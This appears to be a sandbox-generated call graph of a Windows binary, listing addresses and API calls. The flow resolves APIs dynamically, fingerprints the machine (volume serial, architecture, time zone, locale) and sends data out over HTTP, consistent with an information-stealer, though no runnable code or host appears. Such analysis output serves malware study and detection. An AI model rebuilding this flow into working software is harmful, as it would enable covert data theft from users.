14308->14309 14310 1c3ad2 14309->14310 14311 1c45c0 2 API calls 14310->14311 14312 1c3aeb 14311->14312 14313 1c45c0 2 API calls 14312->14313 14314 1c3b04 14313->14314 14315 1c45c0 2 API calls 14314->14315 14316 1c3b1d 14315->14316 14317 1c45c0 2 API calls 14316->14317 14318 1c3b36 14317->14318 14319 1c45c0 2 API calls 14318->14319 14320 1c3b4f 14319->14320 14321 1c45c0 2 API calls 14320->14321 14322 1c3b68 14321->14322 14323 1c45c0 2 API calls 14322->14323 14324 1c3b81 14323->14324 14325 1c45c0 2 API calls 14324->14325 14326 1c3b9a 14325->14326 14327 1c45c0 2 API calls 14326->14327 14328 1c3bb3 14327->14328 14329 1c45c0 2 API calls 14328->14329 14330 1c3bcc 14329->14330 14331 1c45c0 2 API calls 14330->14331 14332 1c3be5 14331->14332 14333 1c45c0 2 API calls 14332->14333 14334 1c3bfe 14333->14334 14335 1c45c0 2 API calls 14334->14335 14336 1c3c17 14335->14336 14337 1c45c0 2 API calls 14336->14337 14338 1c3c30 14337->14338 14339 1c45c0 2 API calls 14338->14339 14340 1c3c49 14339->14340 14341 1c45c0 2 API calls 14340->14341 14342 1c3c62 14341->14342 14343 1c45c0 2 API calls 14342->14343 14344 1c3c7b 14343->14344 14345 1c45c0 2 API calls 14344->14345 14346 1c3c94 14345->14346 14347 1c45c0 2 API calls 14346->14347 14348 1c3cad 14347->14348 14349 1c45c0 2 API calls 14348->14349 14350 1c3cc6 14349->14350 14351 1c45c0 2 API calls 14350->14351 14352 1c3cdf 14351->14352 14353 1c45c0 2 API calls 14352->14353 14354 1c3cf8 14353->14354 14355 1c45c0 2 API calls 14354->14355 14356 1c3d11 14355->14356 14357 1c45c0 2 API calls 14356->14357 14358 1c3d2a 14357->14358 14359 1c45c0 2 API calls 14358->14359 14360 1c3d43 14359->14360 14361 1c45c0 2 API calls 14360->14361 14362 1c3d5c 14361->14362 14363 1c45c0 2 API calls 14362->14363 14364 1c3d75 14363->14364 14365 1c45c0 2 API calls 14364->14365 14366 1c3d8e 14365->14366 14367 1c45c0 2 API calls 14366->14367 14368 1c3da7 14367->14368 14369 1c45c0 2 API calls 14368->14369 14370 1c3dc0 14369->14370 14371 1c45c0 2 API calls 14370->14371 14372 1c3dd9 14371->14372 14373 1c45c0 2 API calls 14372->14373 14374 1c3df2 14373->14374 14375 1c45c0 2 API calls 14374->14375 14376 1c3e0b 14375->14376 14377 1c45c0 2 API calls 14376->14377 14378 1c3e24 14377->14378 14379 1c45c0 2 API calls 14378->14379 14380 1c3e3d 14379->14380 14381 1c45c0 2 API calls 14380->14381 14382 1c3e56 14381->14382 14383 1c45c0 2 API calls 14382->14383 14384 1c3e6f 14383->14384 14385 1c45c0 2 API calls 14384->14385 14386 1c3e88 14385->14386 14387 1c45c0 2 API calls 14386->14387 14388 1c3ea1 14387->14388 14389 1c45c0 2 API calls 14388->14389 14390 1c3eba 14389->14390 14391 1c45c0 2 API calls 14390->14391 14392 1c3ed3 14391->14392 14393 1c45c0 2 API calls 14392->14393 14394 1c3eec 14393->14394 14395 1c45c0 2 API calls 14394->14395 14396 1c3f05 14395->14396 14397 1c45c0 2 API calls 14396->14397 14398 1c3f1e 14397->14398 14399 1c45c0 2 API calls 14398->14399 14400 1c3f37 14399->14400 14401 1c45c0 2 API calls 14400->14401 14402 1c3f50 14401->14402 14403 1c45c0 2 API calls 14402->14403 14404 1c3f69 14403->14404 14405 1c45c0 2 API calls 14404->14405 14406 1c3f82 14405->14406 14407 1c45c0 2 API calls 14406->14407 14408 1c3f9b 14407->14408 14409 1c45c0 2 API calls 14408->14409 14410 1c3fb4 14409->14410 14411 1c45c0 2 API calls 14410->14411 14412 1c3fcd 14411->14412 14413 1c45c0 2 API calls 14412->14413 14414 1c3fe6 14413->14414 14415 1c45c0 2 API calls 14414->14415 14416 1c3fff 14415->14416 14417 1c45c0 2 API calls 14416->14417 14418 1c4018 14417->14418 14419 1c45c0 2 API calls 14418->14419 14420 1c4031 14419->14420 14421 1c45c0 2 API calls 14420->14421 14422 1c404a 14421->14422 14423 1c45c0 2 API calls 14422->14423 14424 1c4063 14423->14424 14425 1c45c0 2 API calls 14424->14425 14426 1c407c 14425->14426 14427 1c45c0 2 API calls 14426->14427 14428 1c4095 14427->14428 14429 1c45c0 2 API calls 14428->14429 14430 1c40ae 14429->14430 14431 1c45c0 2 API calls 14430->14431 14432 1c40c7 14431->14432 14433 1c45c0 2 API calls 14432->14433 14434 1c40e0 14433->14434 14435 1c45c0 2 API calls 14434->14435 14436 1c40f9 14435->14436 14437 1c45c0 2 API calls 14436->14437 14438 1c4112 14437->14438 14439 1c45c0 2 API calls 14438->14439 14440 1c412b 14439->14440 14441 1c45c0 2 API calls 14440->14441 14442 1c4144 14441->14442 14443 1c45c0 2 API calls 14442->14443 14444 1c415d 14443->14444 14445 1c45c0 2 API calls 14444->14445 14446 1c4176 14445->14446 14447 1c45c0 2 API calls 14446->14447 14448 1c418f 14447->14448 14449 1c45c0 2 API calls 14448->14449 14450 1c41a8 14449->14450 14451 1c45c0 2 API calls 14450->14451 14452 1c41c1 14451->14452 14453 1c45c0 2 API calls 14452->14453 14454 1c41da 14453->14454 14455 1c45c0 2 API calls 14454->14455 14456 1c41f3 14455->14456 14457 1c45c0 2 API calls 14456->14457 14458 1c420c 14457->14458 14459 1c45c0 2 API calls 14458->14459 14460 1c4225 14459->14460 14461 1c45c0 2 API calls 14460->14461 14462 1c423e 14461->14462 14463 1c45c0 2 API calls 14462->14463 14464 1c4257 14463->14464 14465 1c45c0 2 API calls 14464->14465 14466 1c4270 14465->14466 14467 1c45c0 2 API calls 14466->14467 14468 1c4289 14467->14468 14469 1c45c0 2 API calls 14468->14469 14470 1c42a2 14469->14470 14471 1c45c0 2 API calls 14470->14471 14472 1c42bb 14471->14472 14473 1c45c0 2 API calls 14472->14473 14474 1c42d4 14473->14474 14475 1c45c0 2 API calls 14474->14475 14476 1c42ed 14475->14476 14477 1c45c0 2 API calls 14476->14477 14478 1c4306 14477->14478 14479 1c45c0 2 API calls 14478->14479 14480 1c431f 14479->14480 14481 1c45c0 2 API calls 14480->14481 14482 1c4338 14481->14482 14483 1c45c0 2 API calls 14482->14483 14484 1c4351 14483->14484 14485 1c45c0 2 API calls 14484->14485 14486 1c436a 14485->14486 14487 1c45c0 2 API calls 14486->14487 14488 1c4383 14487->14488 14489 1c45c0 2 API calls 14488->14489 14490 1c439c 14489->14490 14491 1c45c0 2 API calls 14490->14491 14492 1c43b5 14491->14492 14493 1c45c0 2 API calls 14492->14493 14494 1c43ce 14493->14494 14495 1c45c0 2 API calls 14494->14495 14496 1c43e7 14495->14496 14497 1c45c0 2 API calls 14496->14497 14498 1c4400 14497->14498 14499 1c45c0 2 API calls 14498->14499 14500 1c4419 14499->14500 14501 1c45c0 2 API calls 14500->14501 14502 1c4432 14501->14502 14503 1c45c0 2 API calls 14502->14503 14504 1c444b 14503->14504 14505 1c45c0 2 API calls 14504->14505 14506 1c4464 14505->14506 14507 1c45c0 2 API calls 14506->14507 14508 1c447d 14507->14508 14509 1c45c0 2 API calls 14508->14509 14510 1c4496 14509->14510 14511 1c45c0 2 API calls 14510->14511 14512 1c44af 14511->14512 14513 1c45c0 2 API calls 14512->14513 14514 1c44c8 14513->14514 14515 1c45c0 2 API calls 14514->14515 14516 1c44e1 14515->14516 14517 1c45c0 2 API calls 14516->14517 14518 1c44fa 14517->14518 14519 1c45c0 2 API calls 14518->14519 14520 1c4513 14519->14520 14521 1c45c0 2 API calls 14520->14521 14522 1c452c 14521->14522 14523 1c45c0 2 API calls 14522->14523 14524 1c4545 14523->14524 14525 1c45c0 2 API calls 14524->14525 14526 1c455e 14525->14526 14527 1c45c0 2 API calls 14526->14527 14528 1c4577 14527->14528 14529 1c45c0 2 API calls 14528->14529 14530 1c4590 14529->14530 14531 1c45c0 2 API calls 14530->14531 14532 1c45a9 14531->14532 14533 1d9c10 14532->14533 14534 1da036 8 API calls 14533->14534 14535 1d9c20 43 API calls 14533->14535 14536 1da0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14534->14536 14537 1da146 14534->14537 14535->14534 14536->14537 14538 1da216 14537->14538 14539 1da153 8 API calls 14537->14539 14540 1da21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14538->14540 14541 1da298 14538->14541 14539->14538 14540->14541 14542 1da2a5 6 API calls 14541->14542 14543 1da337 14541->14543 14542->14543 14544 1da41f 14543->14544 14545 1da344 9 API calls 14543->14545 14546 1da428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14544->14546 14547 1da4a2 14544->14547 14545->14544 14546->14547 14548 1da4dc 14547->14548 14549 1da4ab GetProcAddress GetProcAddress 14547->14549 14550 1da515 14548->14550 14551 1da4e5 GetProcAddress GetProcAddress 14548->14551 14549->14548 14552 1da612 14550->14552 14553 1da522 10 API calls 14550->14553 14551->14550 14554 1da67d 14552->14554 14555 1da61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14552->14555 14553->14552 14556 1da69e 14554->14556 14557 1da686 GetProcAddress 14554->14557 14555->14554 14558 1d5ca3 14556->14558 14559 1da6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14556->14559 14557->14556 14560 1c1590 14558->14560 14559->14558 15679 1c1670 14560->15679 14563 1da7a0 lstrcpy 14564 1c15b5 14563->14564 14565 1da7a0 lstrcpy 14564->14565 14566 1c15c7 14565->14566 14567 1da7a0 lstrcpy 14566->14567 14568 1c15d9 14567->14568 14569 1da7a0 lstrcpy 14568->14569 14570 1c1663 14569->14570 14571 1d5510 14570->14571 14572 1d5521 14571->14572 14573 1da820 2 API calls 14572->14573 14574 1d552e 14573->14574 14575 1da820 2 API calls 14574->14575 14576 1d553b 14575->14576 14577 1da820 2 API calls 14576->14577 14578 1d5548 14577->14578 14579 1da740 lstrcpy 14578->14579 14580 1d5555 14579->14580 14581 1da740 lstrcpy 14580->14581 14582 1d5562 14581->14582 14583 1da740 lstrcpy 14582->14583 14584 1d556f 14583->14584 14585 1da740 lstrcpy 14584->14585 14624 1d557c 14585->14624 14586 1c1590 lstrcpy 14586->14624 14587 1d52c0 25 API calls 14587->14624 14588 1d5643 StrCmpCA 14588->14624 14589 1d56a0 StrCmpCA 14590 1d57dc 14589->14590 14589->14624 14591 1da8a0 lstrcpy 14590->14591 14592 1d57e8 14591->14592 14594 1da820 2 API calls 14592->14594 14593 1da820 lstrlen lstrcpy 14593->14624 14595 1d57f6 14594->14595 14598 1da820 2 API calls 14595->14598 14596 1d5856 StrCmpCA 14597 1d5991 14596->14597 14596->14624 14599 1da8a0 lstrcpy 14597->14599 14600 1d5805 14598->14600 14601 1d599d 14599->14601 14602 1c1670 lstrcpy 14600->14602 14604 1da820 2 API calls 14601->14604 14621 1d5811 14602->14621 14603 1da740 lstrcpy 14603->14624 14606 1d59ab 14604->14606 14605 1d5a0b StrCmpCA 14607 1d5a28 14605->14607 14608 1d5a16 Sleep 14605->14608 14609 1da820 2 API calls 14606->14609 14610 1da8a0 lstrcpy 14607->14610 14608->14624 14611 1d59ba 14609->14611 14613 1d5a34 14610->14613 14612 1c1670 lstrcpy 14611->14612 14612->14621 14614 1da820 2 API calls 14613->14614 14615 1d5a43 14614->14615 14617 1da820 2 API calls 14615->14617 14616 1d51f0 20 API calls 14616->14624 14618 1d5a52 14617->14618 14620 1c1670 lstrcpy 14618->14620 14619 1d578a StrCmpCA 14619->14624 14620->14621 14621->13678 14622 1d593f StrCmpCA 14622->14624 14623 1da7a0 lstrcpy 14623->14624 14624->14586 14624->14587 14624->14588 14624->14589 14624->14593 14624->14596 14624->14603 14624->14605 14624->14616 14624->14619 14624->14622 14624->14623 14625 1da8a0 lstrcpy 14624->14625 14625->14624 14627 1d754c 14626->14627 14628 1d7553 GetVolumeInformationA 14626->14628 14627->14628 14629 1d7591 14628->14629 14630 1d75fc GetProcessHeap RtlAllocateHeap 14629->14630 14631 1d7619 14630->14631 14632 1d7628 wsprintfA 14630->14632 14633 1da740 lstrcpy 14631->14633 14634 1da740 lstrcpy 14632->14634 14635 1d5da7 14633->14635 14634->14635 14635->13699 14637 1da7a0 lstrcpy 14636->14637 14638 1c4899 14637->14638 15688 1c47b0 14638->15688 14640 1c48a5 14641 1da740 lstrcpy 14640->14641 14642 1c48d7 14641->14642 14643 1da740 lstrcpy 14642->14643 14644 1c48e4 14643->14644 14645 1da740 lstrcpy 14644->14645 14646 1c48f1 14645->14646 14647 1da740 lstrcpy 14646->14647 14648 1c48fe 14647->14648 14649 1da740 lstrcpy 14648->14649 14650 1c490b InternetOpenA StrCmpCA 14649->14650 14651 1c4944 14650->14651 14652 1c4ecb InternetCloseHandle 14651->14652 15694 1d8b60 14651->15694 14653 1c4ee8 14652->14653 15709 1c9ac0 CryptStringToBinaryA 14653->15709 14655 1c4963 15702 1da920 14655->15702 14658 1c4976 14660 1da8a0 lstrcpy 14658->14660 14665 1c497f 14660->14665 14661 1da820 2 API calls 14662 1c4f05 14661->14662 14663 1da9b0 4 API calls 14662->14663 14666 1c4f1b 14663->14666 14664 1c4f27 ctype 14667 1da7a0 lstrcpy 14664->14667 14669 1da9b0 4 API calls 14665->14669 14668 1da8a0 lstrcpy 14666->14668 14680 1c4f57 14667->14680 14668->14664 14670 1c49a9 14669->14670 14671 1da8a0 lstrcpy 14670->14671 14672 1c49b2 14671->14672 14673 1da9b0 4 API calls 14672->14673 14674 1c49d1 14673->14674 14675 1da8a0 lstrcpy 14674->14675 14676 1c49da 14675->14676 14677 1da920 3 API calls 14676->14677 14678 1c49f8 14677->14678 14679 1da8a0 lstrcpy 14678->14679 14681 1c4a01 14679->14681 14680->13702 14682 1da9b0 4 API calls 14681->14682 14683 1c4a20 14682->14683 14684 1da8a0 lstrcpy 14683->14684 14685 1c4a29 14684->14685 14686 1da9b0 4 API calls 14685->14686 14687 1c4a48 14686->14687 14688 1da8a0 lstrcpy 14687->14688 14689 1c4a51 14688->14689 14690 1da9b0 4 API calls 14689->14690 14691 1c4a7d 14690->14691 14692 1da920 3 API calls 14691->14692 14693 1c4a84 14692->14693 14694 1da8a0 lstrcpy 14693->14694 14695 1c4a8d 14694->14695 14696 1c4aa3 InternetConnectA 14695->14696 14696->14652 14697 1c4ad3 HttpOpenRequestA 14696->14697 14699 1c4ebe InternetCloseHandle 14697->14699 14700 1c4b28 14697->14700 14699->14652 14701 1da9b0 4 API calls 14700->14701 14702 1c4b3c 14701->14702 14703 1da8a0 lstrcpy 14702->14703 14704 1c4b45 14703->14704 14705 1da920 3 API calls 14704->14705 14706 1c4b63 14705->14706 14707 1da8a0 lstrcpy 14706->14707 14708 1c4b6c 14707->14708 14709 1da9b0 4 API calls 14708->14709 14710 1c4b8b 14709->14710 14711 1da8a0 lstrcpy 14710->14711 14712 1c4b94 14711->14712 14713 1da9b0 4 API calls 14712->14713 14714 1c4bb5 14713->14714 14715 1da8a0 lstrcpy 14714->14715 14716 1c4bbe 14715->14716 14717 1da9b0 4 API calls 14716->14717 14718 1c4bde 14717->14718 14719 1da8a0 lstrcpy 14718->14719 14720 1c4be7 14719->14720 14721 1da9b0 4 API calls 14720->14721 14722 1c4c06 14721->14722 14723 1da8a0 lstrcpy 14722->14723 14724 1c4c0f 14723->14724 14725 1da920 3 API calls 14724->14725 14726 1c4c2d 14725->14726 14727 1da8a0 lstrcpy 14726->14727 14728 1c4c36 14727->14728 14729 1da9b0 4 API calls 14728->14729 14730 1c4c55 14729->14730 14731 1da8a0 lstrcpy 14730->14731 14732 1c4c5e 14731->14732 14733 1da9b0 4 API calls 14732->14733 14734 1c4c7d 14733->14734 14735 1da8a0 lstrcpy 14734->14735 14736 1c4c86 14735->14736 14737 1da920 3 API calls 14736->14737 14738 1c4ca4 14737->14738 14739 1da8a0 lstrcpy 14738->14739 14740 1c4cad 14739->14740 14741 1da9b0 4 API calls 14740->14741 14742 1c4ccc 14741->14742 14743 1da8a0 lstrcpy 14742->14743 14744 1c4cd5 14743->14744 14745 1da9b0 4 API calls 14744->14745 14746 1c4cf6 14745->14746 14747 1da8a0 lstrcpy 14746->14747 14748 1c4cff 14747->14748 14749 1da9b0 4 API calls 14748->14749 14750 1c4d1f 14749->14750 14751 1da8a0 lstrcpy 14750->14751 14752 1c4d28 14751->14752 14753 1da9b0 4 API calls 14752->14753 14754 1c4d47 14753->14754 14755 1da8a0 lstrcpy 14754->14755 14756 1c4d50 14755->14756 14757 1da920 3 API calls 14756->14757 14758 1c4d6e 14757->14758 14759 1da8a0 lstrcpy 14758->14759 14760 1c4d77 14759->14760 14761 1da740 lstrcpy 14760->14761 14762 1c4d92 14761->14762 14763 1da920 3 API calls 14762->14763 14764 1c4db3 14763->14764 14765 1da920 3 API calls 14764->14765 14766 1c4dba 14765->14766 14767 1da8a0 lstrcpy 14766->14767 14768 1c4dc6 14767->14768 14769 1c4de7 lstrlen 14768->14769 14770 1c4dfa 14769->14770 14771 1c4e03 lstrlen 14770->14771 15708 1daad0 14771->15708 14773 1c4e13 HttpSendRequestA 14774 1c4e32 InternetReadFile 14773->14774 14775 1c4e67 InternetCloseHandle 14774->14775 14780 1c4e5e 14774->14780 14778 1da800 14775->14778 14777 1da9b0 4 API calls 14777->14780 14778->14699 14779 1da8a0 lstrcpy 14779->14780 14780->14774 14780->14775 14780->14777 14780->14779 15715 1daad0 14781->15715 14783 1d17c4 StrCmpCA 14784 1d17cf ExitProcess 14783->14784 14788 1d17d7 14783->14788 14785 1d19c2 14785->13704 14786 1d185d StrCmpCA 14786->14788 14787 1d187f StrCmpCA 14787->14788 14788->14785 14788->14786 14788->14787 14789 1d18f1 StrCmpCA 14788->14789 14790 1d1951 StrCmpCA 14788->14790 14791 1d1970 StrCmpCA 14788->14791 14792 1d1913 StrCmpCA 14788->14792 14793 1d1932 StrCmpCA 14788->14793 14794 1d18ad StrCmpCA 14788->14794 14795 1d18cf StrCmpCA 14788->14795 14796 1da820 lstrlen lstrcpy 14788->14796 14789->14788 14790->14788 14791->14788 14792->14788 14793->14788 14794->14788 14795->14788 14796->14788 14798 1da7a0 lstrcpy 14797->14798 14799 1c5979 14798->14799 14800 1c47b0 2 API calls 14799->14800 14801 1c5985 14800->14801 14802 1da740 lstrcpy 14801->14802 14803 1c59ba 14802->14803 14804 1da740 lstrcpy 14803->14804 14805 1c59c7 14804->14805 14806 1da740 lstrcpy 14805->14806 14807 1c59d4 14806->14807 14808 1da740 lstrcpy 14807->14808 14809 1c59e1 14808->14809 14810 1da740 lstrcpy 14809->14810 14811 1c59ee InternetOpenA StrCmpCA 14810->14811 14812 1c5a1d 14811->14812 14813 1c5fc3 InternetCloseHandle 14812->14813 14814 1d8b60 3 API calls 14812->14814 14815 1c5fe0 14813->14815 14816 1c5a3c 14814->14816 14818 1c9ac0 4 API calls 14815->14818 14817 1da920 3 API calls 14816->14817 14820 1c5a4f 14817->14820 14819 1c5fe6 14818->14819 14822 1da820 2 API calls 14819->14822 14825 1c601f ctype 14819->14825 14821 1da8a0 lstrcpy 14820->14821 14826 1c5a58 14821->14826 14823 1c5ffd 14822->14823 14824 1da9b0 4 API calls 14823->14824 14827 1c6013 14824->14827 14829 1da7a0 lstrcpy 14825->14829 14830 1da9b0 4 API calls 14826->14830 14828 1da8a0 lstrcpy 14827->14828 14828->14825 14838 1c604f 14829->14838 14831 1c5a82 14830->14831 14832 1da8a0 lstrcpy 14831->14832 14833 1c5a8b 14832->14833 14834 1da9b0 4 API calls 14833->14834 14835 1c5aaa 14834->14835 14836 1da8a0 lstrcpy 14835->14836 14837 1c5ab3 14836->14837 14839 1da920 3 API calls 14837->14839 14838->13710 14840 1c5ad1 14839->14840 14841 1da8a0 lstrcpy 14840->14841 14842 1c5ada 14841->14842 14843 1da9b0 4 API calls 14842->14843 14844 1c5af9 14843->14844 14845 1da8a0 lstrcpy 14844->14845 14846 1c5b02 14845->14846 14847 1da9b0 4 API calls 14846->14847 14848 1c5b21 14847->14848 14849 1da8a0 lstrcpy 14848->14849 14850 1c5b2a 14849->14850 14851 1da9b0 4 API calls 14850->14851 14852 1c5b56 14851->14852 14853 1da920 3 API calls 14852->14853 14854 1c5b5d 14853->14854 14855 1da8a0 lstrcpy 14854->14855 14856 1c5b66 14855->14856 14857 1c5b7c InternetConnectA 14856->14857 14857->14813 14858 1c5bac HttpOpenRequestA 14857->14858 14860 1c5c0b 14858->14860 14861 1c5fb6 InternetCloseHandle 14858->14861 14862 1da9b0 4 API calls 14860->14862 14861->14813 14863 1c5c1f 14862->14863 14864 1da8a0 lstrcpy 14863->14864 14865 1c5c28 14864->14865 14866 1da920 3 API calls 14865->14866 14867 1c5c46 14866->14867 14868 1da8a0 lstrcpy 14867->14868 14869 1c5c4f 14868->14869 14870 1da9b0 4 API calls 14869->14870 14871 1c5c6e 14870->14871 14872 1da8a0 lstrcpy 14871->14872 14873 1c5c77 14872->14873 14874 1da9b0 4 API calls 14873->14874 14875 1c5c98 14874->14875 14876 1da8a0 lstrcpy 14875->14876 14877 1c5ca1 14876->14877 14878 1da9b0 4 API calls 14877->14878 14879 1c5cc1 14878->14879 14880 1da8a0 lstrcpy 14879->14880 14881 1c5cca 14880->14881 14882 1da9b0 4 API calls 14881->14882 14883 1c5ce9 14882->14883 14884 1da8a0 lstrcpy 14883->14884 14885 1c5cf2 14884->14885 14886 1da920 3 API calls 14885->14886 14887 1c5d10 14886->14887 14888 1da8a0 lstrcpy 14887->14888 14889 1c5d19 14888->14889 14890 1da9b0 4 API calls 14889->14890 14891 1c5d38 14890->14891 14892 1da8a0 lstrcpy 14891->14892 14893 1c5d41 14892->14893 14894 1da9b0 4 API calls 14893->14894 14895 1c5d60 14894->14895 14896 1da8a0 lstrcpy 14895->14896 14897 1c5d69 14896->14897 14898 1da920 3 API calls 14897->14898 14899 1c5d87 14898->14899 14900 1da8a0 lstrcpy 14899->14900 14901 1c5d90 14900->14901 14902 1da9b0 4 API calls 14901->14902 14903 1c5daf 14902->14903 14904 1da8a0 lstrcpy 14903->14904 14905 1c5db8 14904->14905 14906 1da9b0 4 API calls 14905->14906 14907 1c5dd9 14906->14907 14908 1da8a0 lstrcpy 14907->14908 14909 1c5de2 14908->14909 14910 1da9b0 4 API calls 14909->14910 14911 1c5e02 14910->14911 14912 1da8a0 lstrcpy 14911->14912 14913 1c5e0b 14912->14913 14914 1da9b0 4 API calls 14913->14914 14915 1c5e2a 14914->14915 14916 1da8a0 lstrcpy 14915->14916 14917 1c5e33 14916->14917 14918 1da920 3 API calls 14917->14918 14919 1c5e54 14918->14919 14920 1da8a0 lstrcpy 14919->14920 14921 1c5e5d 14920->14921 14922 1c5e70 lstrlen 14921->14922 15716 1daad0 14922->15716 14924 1c5e81 lstrlen GetProcessHeap RtlAllocateHeap 15717 1daad0 14924->15717 14926 1c5eae lstrlen 14927 1c5ebe 14926->14927 14928 1c5ed7 lstrlen 14927->14928 14929 1c5ee7 14928->14929 14930 1c5ef0 lstrlen 14929->14930 14931 1c5f04 14930->14931 14932 1c5f1a lstrlen 14931->14932 15718 1daad0 14932->15718 14934 1c5f2a HttpSendRequestA 14935 1c5f35 InternetReadFile 14934->14935 14936 1c5f6a InternetCloseHandle 14935->14936 14940 1c5f61 14935->14940 14936->14861 14938 1da9b0 4 API calls 14938->14940 14939 1da8a0 lstrcpy 14939->14940 14940->14935 14940->14936 14940->14938 14940->14939 14943 1d1077 14941->14943 14942 1d1151 14942->13712 14943->14942 14944 1da820 lstrlen lstrcpy 14943->14944 14944->14943 14946 1d0db7 14945->14946 14947 1d0f17 14946->14947 14948 1d0ea4 StrCmpCA 14946->14948 14949 1d0e27 StrCmpCA 14946->14949 14950 1d0e67 StrCmpCA 14946->14950 14951 1da820 lstrlen lstrcpy 14946->14951 14947->13720 14948->14946 14949->14946 14950->14946 14951->14946 14953 1d0f67 14952->14953 14954 1d1044 14953->14954 14955 1d0fb2 StrCmpCA 14953->14955 14956 1da820 lstrlen lstrcpy 14953->14956 14954->13728 14955->14953 14956->14953 14958 1da740 lstrcpy 14957->14958 14959 1d1a26 14958->14959 14960 1da9b0 4 API calls 14959->14960 14961 1d1a37 14960->14961 14962 1da8a0 lstrcpy 14961->14962 14963 1d1a40 14962->14963 14964 1da9b0 4 API calls 14963->14964 14965 1d1a5b 14964->14965 14966 1da8a0 lstrcpy 14965->14966 14967 1d1a64 14966->14967 14968 1da9b0 4 API calls 14967->14968 14969 1d1a7d 14968->14969 14970 1da8a0 lstrcpy 14969->14970 14971 1d1a86 14970->14971 14972 1da9b0 4 API calls 14971->14972 14973 1d1aa1 14972->14973 14974 1da8a0 lstrcpy 14973->14974 14975 1d1aaa 14974->14975 14976 1da9b0 4 API calls 14975->14976 14977 1d1ac3 14976->14977 14978 1da8a0 lstrcpy 14977->14978 14979 1d1acc 14978->14979 14980 1da9b0 4 API calls 14979->14980 14981 1d1ae7 14980->14981 14982 1da8a0 lstrcpy 14981->14982 14983 1d1af0 14982->14983 14984 1da9b0 4 API calls 14983->14984 14985 1d1b09 14984->14985 14986 1da8a0 lstrcpy 14985->14986 14987 1d1b12 14986->14987 14988 1da9b0 4 API calls 14987->14988 14989 1d1b2d 14988->14989 14990 1da8a0 lstrcpy 14989->14990 14991 1d1b36 14990->14991 14992 1da9b0 4 API calls 14991->14992 14993 1d1b4f 14992->14993 14994 1da8a0 lstrcpy 14993->14994 14995 1d1b58 14994->14995 14996 1da9b0 4 API calls 14995->14996 14997 1d1b76 14996->14997 14998 1da8a0 lstrcpy 14997->14998 14999 1d1b7f 14998->14999 15000 1d7500 6 API calls 14999->15000 15001 1d1b96 15000->15001 15002 1da920 3 API calls 15001->15002 15003 1d1ba9 15002->15003 15004 1da8a0 lstrcpy 15003->15004 15005 1d1bb2 15004->15005 15006 1da9b0 4 API calls 15005->15006 15007 1d1bdc 15006->15007 15008 1da8a0 lstrcpy 15007->15008 15009 1d1be5 15008->15009 15010 1da9b0 4 API calls 15009->15010 15011 1d1c05 15010->15011 15012 1da8a0 lstrcpy 15011->15012 15013 1d1c0e 15012->15013 15719 1d7690 GetProcessHeap RtlAllocateHeap 15013->15719 15016 1da9b0 4 API calls 15017 1d1c2e 15016->15017 15018 1da8a0 lstrcpy 15017->15018 15019 1d1c37 15018->15019 15020 1da9b0 4 API calls 15019->15020 15021 1d1c56 15020->15021 15022 1da8a0 lstrcpy 15021->15022 15023 1d1c5f 15022->15023 15024 1da9b0 4 API calls 15023->15024 15025 1d1c80 15024->15025 15026 1da8a0 lstrcpy 15025->15026 15027 1d1c89 15026->15027 15726 1d77c0 GetCurrentProcess IsWow64Process 15027->15726 15030 1da9b0 4 API calls 15031 1d1ca9 15030->15031 15032 1da8a0 lstrcpy 15031->15032 15033 1d1cb2 15032->15033 15034 1da9b0 4 API calls 15033->15034 15035 1d1cd1 15034->15035 15036 1da8a0 lstrcpy 15035->15036 15037 1d1cda 15036->15037 15038 1da9b0 4 API calls 15037->15038 15039 1d1cfb 15038->15039 15040 1da8a0 lstrcpy 15039->15040 15041 1d1d04 15040->15041 15042 1d7850 3 API calls 15041->15042 15043 1d1d14 15042->15043 15044 1da9b0 4 API calls 15043->15044 15045 1d1d24 15044->15045 15046 1da8a0 lstrcpy 15045->15046 15047 1d1d2d 15046->15047 15048 1da9b0 4 API calls 15047->15048 15049 1d1d4c 15048->15049 15050 1da8a0 lstrcpy 15049->15050 15051 1d1d55 15050->15051 15052 1da9b0 4 API calls 15051->15052 15053 1d1d75 15052->15053 15054 1da8a0 lstrcpy 15053->15054 15055 1d1d7e 15054->15055 15056 1d78e0 3 API calls 15055->15056 15057 1d1d8e 15056->15057 15058 1da9b0 4 API calls 15057->15058 15059 1d1d9e 15058->15059 15060 1da8a0 lstrcpy 15059->15060 15061 1d1da7 15060->15061 15062 1da9b0 4 API calls 15061->15062 15063 1d1dc6 15062->15063 15064 1da8a0 lstrcpy 15063->15064 15065 1d1dcf 15064->15065 15066 1da9b0 4 API calls 15065->15066 15067 1d1df0 15066->15067 15068 1da8a0 lstrcpy 15067->15068 15069 1d1df9 15068->15069 15728 1d7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15069->15728 15072 1da9b0 4 API calls 15073 1d1e19 15072->15073 15074 1da8a0 lstrcpy 15073->15074 15075 1d1e22 15074->15075 15076 1da9b0 4 API calls 15075->15076 15077 1d1e41 15076->15077 15078 1da8a0 lstrcpy 15077->15078 15079 1d1e4a 15078->15079 15080 1da9b0 4 API calls 15079->15080 15081 1d1e6b 15080->15081 15082 1da8a0 lstrcpy 15081->15082 15083 1d1e74 15082->15083 15730 1d7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15083->15730 15086 1da9b0 4 API calls 15087 1d1e94 15086->15087 15088 1da8a0 lstrcpy 15087->15088 15089 1d1e9d 15088->15089 15090 1da9b0 4 API calls 15089->15090 15091 1d1ebc 15090->15091 15092 1da8a0 lstrcpy 15091->15092 15093 1d1ec5 15092->15093 15094 1da9b0 4 API calls 15093->15094 15095 1d1ee5 15094->15095 15096 1da8a0 lstrcpy 15095->15096 15097 1d1eee 15096->15097 15733 1d7b00 GetUserDefaultLocaleName 15097->15733 15100 1da9b0 4 API calls 15101 1d1f0e 15100->15101 15102 1da8a0 lstrcpy 15101->15102 15103 1d1f17 15102->15103 15104 1da9b0 4 API calls 15103->15104 15105 1d1f36 15104->15105 15106 1da8a0 lstrcpy 15105->15106 15107 1d1f3f 15106->15107 15108 1da9b0 4 API calls 15107->15108 15109 1d1f60 15108->15109 15110 1da8a0 lstrcpy 15109->15110 15111 1d1f69 15110->15111 15737 1d7b90 15111->15737 15113 1d1f80 15114 1da920 3 API calls 15113->15114 15115 1d1f93 